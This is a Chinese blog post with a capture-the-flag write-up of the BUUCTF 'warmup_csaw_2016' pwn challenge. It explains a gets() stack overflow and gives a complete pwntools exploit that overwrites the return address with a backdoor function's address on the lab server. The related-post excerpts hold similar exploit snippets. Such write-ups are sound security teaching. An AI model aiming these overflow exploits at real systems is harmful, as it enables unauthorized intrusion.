BUU CTF PWN warmup_csaw_2016 WriteUp

已于 2023-04-04 09:19:23 修改
阅读量227 收藏 1
点赞数
分类专栏: BUU-PWN 文章标签: pwn python 网络安全 信息安全 WriteUp
于 2022-02-27 12:14:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/123162296
版权

warmup_csaw_2016

使用checksec查看:
在这里插入图片描述
保护措施全部关闭。

放进IDA中分析:
在这里插入图片描述

  • sprintf(&s, "%p\n", sub_40060D);:直接打印出了函数sub_40060D的地址。
  • return gets(&v5, ">");:存在栈溢出

sub_40060D()
在这里插入图片描述

  • 存在后门函数

步骤解析

程序会输出后门函数的地址,直接拿来使用。

不存在Canary,栈溢出直接覆盖返回地址。

完整exp

from pwn import *

# r = process("../buu/warmup_csaw_2016")
r = remote("node4.buuoj.cn",28223)
addr = 0x40060D
payload = b'M'*(0x40+8) + p64(addr)
r.recv()
r.sendline(payload)

r.interactive()
m0sway
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF|warmup_csaw_2016 1
cm_zl
04-30 1252
from pwn import * context.log_level = 'debug' io=remote('node3.buuoj.cn', "28247") payload = "A"*(0x48) + p64(0x40060D) io.sendline(payload) io.interactive()
CSAW CTF 2016 PWN quals-warmup
Hvnt3r的博客
03-06 2088
CSAW CTF 2016 PWN quals-warmup 原文链接 先对文件有个大致的了解,是64位ELF文件 ☁ csaw ctf 2016 quals-warmup ls exp.py flag.txt readme.txt warmupcsaw ctf 2016 quals-warmup file warmup warmup: ELF 64-bit LSB exec...
warmup_csaw_2016
weixin_56301399的博客
07-20 1351
做了几道入门的题,从原来的柔弱蚂蚁到现在稍稍强壮的蚂蚁,我决定实施菜狗子计划,让蚂蚁继续进化。题目中的思路很清晰,对于栈溢出,我们先判断是否有栈溢出的漏洞,之后去找系统调用的函数,然后查到他的地址,最后就是我们的代码构建了。偏移量的计算=(数组本身大小+对应位的偏移64位是ox8)然后加上我们系统调用函数的地址。...
warmup_csaw_2016 1
weixin_52034946的博客
01-13 816
先checksec 是64位,小端序 进入ida,查看字符串 有一个cat flag 的字符串,跟进去,是这个函数,也就是执行这个函数我们就可以得到flag 一如既往的来到了main 函数处, 也是看到了get函数,一般就是栈溢出了,v5的大小位0x40,再加上是64位,所以要输入0x40+8,来造成栈溢出 脚本 from pwn import* r=remote(‘node3.buuoj.cn’,28011) flag_addr = 0x40060D payload = ‘a’*(0x40+8)+p6
BUUCTF PWN warmup_csaw_2016
Rt1Text的博客
04-22 407
1.checksec+运行 64位/没有保护 2.64位IDA进行 1.main 函数 明显的溢出函数gets() 跟进v5看看 offset = 0x40+8 shift+f12 真不错,cat flag.txt 找它的地址 3.上脚本 from pwn import* #p=process('./3warmup') p=remote("node4.buuoj.cn",28180) flag_addr=0x400611 payload=b'a'*(0...
CTF buuoj pwn-----第3题:warmup_csaw_2016
bing_Max的博客
08-29 1715
CTF buuoj pwn-----第3题:warmup_csaw_2016前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 979
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCT-PWN 0ctf_2018_heapstorm2(house of storm)
weixin_44145820的博客
04-25 1663
目录题目分析漏洞利用Exp 题目分析 这题估计是house of storm利用的起源? 因为用这种办法直接就可以做通,后面还有rctf_2019_babyheap也需要用到house of storm,但是那题限制条件多多了 init()里先把fastbin禁用了 申请了0x13370000这块内存,并且做了初始化 初始化首先读入长度为0x18的随机数,就记为3个long long随机数吧...
buuctf——not_the_same_3dsctf_2016
qq_41560595的博客
03-26 475
这道题和前面分析过的get_started_3dsctf_2016差不多,换汤不换药。 选择一个地址0x080EB000,用来装shellcode。这个地址要改成可执行的。使用mprotect函数改变。 解题代码: from pwn import * #p=process("./not") p=remote("node3.buuoj.cn",29607) elf=ELF("./not") read=elf.symbols["read"] mprotect=elf.symbols["mprotect"] m
crypto-baby_writeup(buuctf)
耐酸碱高温固化材料近距离传输研究
12-27 370
大概审计了一下enc函数,能看出来是将用户输入字符串每4个字节进行处理,生成3个字节,那么用户输入16个字节最后会加密成12个字节,与data区601100的数据进行比对,比对成功后即输出flag。将原来的比对逻辑改了一下,原来是加密后字节与601100部分比对,比对不成功则退出,改成比对成功则退出,那么现在就可以构造特殊的payload来枚举flag了。elf打补丁教程可以参考。题目提供了一个elf可执行文件,叫做baby_wp。逆向加解密,记录一下。
0ctf_2016_warmup
05-17
2016年0ctfpwn题。
日行一PWN之ciscn_2019_c_1不给出libc题型
m0_57221101的博客
06-02 797
BUUCTF ciscn 依旧使用buu提供的题这次大体和上次babyrop一样,都是使用源程序中不存在的函数来进行攻击,区别在于此次没有给出libc的版本,我们需要自己暴漏libc的版本以及本次的64位程序,在传参上和32位程序的一些不同闲话少叙,后面需要的知识点我们后面再学,我们便分析边聊checksec分析64位的程序,只有数据段免执行保护。地址为0000000000400B28我们可以通过telnet连接一下看看她在干什么可以看到是一个简单的输入判断
BUUCTF-warmup_csaw_2016 (新手pwner的成长日记3)
最新发布
weixin_58410275的博客
04-23 1009
解释一下这里填充数据为什么是4*16,我们在ida里面双击v5这个字符进入栈区一看,它是在s的基础上,从0到40的var_40占用的是4*16个字节的空间,+8是因为64位文件的rbp需要填充。的函数,进去一看,不得了不得了,我们的payload直接利用sub_40060D函数就行了,甚至不需要获取shell权限,地址在反编译之前可以在函数末尾看见的,就不做展示了。由于文件的漏洞函数直接打开了flag文件,所以我们直接得到了flag的交互。然后我们再翻一翻,找一找,有个。gets的内容,这里思路就到达。
[BUUCTF]PWN3——warmup_csaw_2016
mcmuyanga的博客
08-24 1012
[BUUCTF]3——warmup_csaw_2016 题目网址:https://buuoj.cn/challenges#warmup_csaw_2016 步骤: 例行检查,64位,没有开启任何保护 nc一下,看看输入点的字符串,看到回显了一个地址,之后让我们输入,输入完之后就退出了 用64位ida打开附件,首先shift+f12查看程序里的字符串,可以看到有一个“cat flag.txt”字符串引人注目 双击字符串跟进,ctrl+x查看哪个函数调用了这个字符串,找到函数后按f5反编译成我们熟悉的伪代
[BUUCTF-PWN] warmup_csaw_2016
m0_46098032的博客
01-03 373
下载文件,checksec看一下,保护都没开,64位文件。 用IDA64打开文件,查看一下main函数。可以看到明显的栈溢出漏洞(gets)。 看一下v5,v5大小是 0x40, 返回地址是8 字节, 溢出大小就是0x48。 sub_40060D有点可疑,双击看一下。发现这里就是system函数,我们在构造pyaload的时候加上sub_40060D。 exp为: from pwn import * p = remote('node4.buuoj.cn', 2574...
[BUUCTF-pwn]——warmup_csaw_2016
Y_peak的博客
01-30 3962
BUUCTF——warmup_csaw_2016 题目地址:https://buuoj.cn/challenges 题目: 管他三七二十一,先将文件下载下来再说。老规矩,现在Linux上用checksec看看文件。64位,Stack、NX、PIE都没有开,应该是栈溢出的题。 赶快 go go go 去window 上用IDA反汇编看看,看到返回的是gets函数,一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。 按Shift + F12,看一下字符串。不看不知道一看有惊喜。cat flag.
Buuctf pwn warmup_csaw_2016
2301_79960856的博客
02-29 363
字符串窗口中发现flag,并寻其地址为40060d。main函数中发现gets函数造成栈溢出。总大小为0×40+0×8。2.放入ida64反编译。
buuoj warmup_csaw_2016
weixin_52942048的博客
10-15 111
(1)v5的长度是40(双击点进去就可以看到长度)这里确定执行 cat flag.txt的地址即可。(2)返回地址8个字节。
buu ctf web进阶]ssti
08-23
buu ctf web进阶中,ssti代表 Side Template Injection,是一种应用程序中的安全漏洞。通过此漏洞,攻击者可以注入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值